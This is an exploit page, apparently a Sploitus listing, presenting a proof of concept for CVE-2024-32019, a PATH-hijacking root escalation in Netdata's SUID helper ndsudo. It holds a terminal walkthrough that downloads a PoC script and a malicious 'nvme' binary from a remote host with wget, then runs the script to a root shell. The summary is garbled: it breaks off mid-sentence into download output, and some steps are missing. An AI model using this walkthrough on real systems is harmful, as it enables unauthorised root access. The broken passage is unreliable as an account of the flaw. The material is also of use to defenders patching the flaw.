Share
## https://sploitus.com/exploit?id=878C6F09-DCBD-563B-816E-5E725C862B2D
# CVE-2024-32019 Netdata ndsudo Privilege Escalation PoC

## Summary

CVE-2024-32019 is a local privilege-escalation flaw in Netdata’s SUID helper ndsudo that lets a local user execute arbitrary programs as root via an untrusted search path (PATH hijacking). 

The issue exists because ndsudo restricts command names but resolves them using the caller’s PATH, allowing a user to place a malicious binary earlier in PATH and have ndsudo run it with root privileges. 

It affects Netdata Agent versions ≥ v1.45.0 and ]     712  --.-KB/s    in 0s

2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]

test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10--  http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 876128 (856K) [application/octet-stream]
Saving to: ‘nvme’

nvme                                                 100%[==================================================>] 855.59K  1.98MB/s    in 0.4s

2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [876128/876128]
```
3. Execute PoC
```
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#

```

#### Sources:
- https://www.rapid7.com/db/modules/exploit/linux/local/ndsudo_cve_2024_32019/
- https://www.wiz.io/vulnerability-database/cve/cve-2024-32019
- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93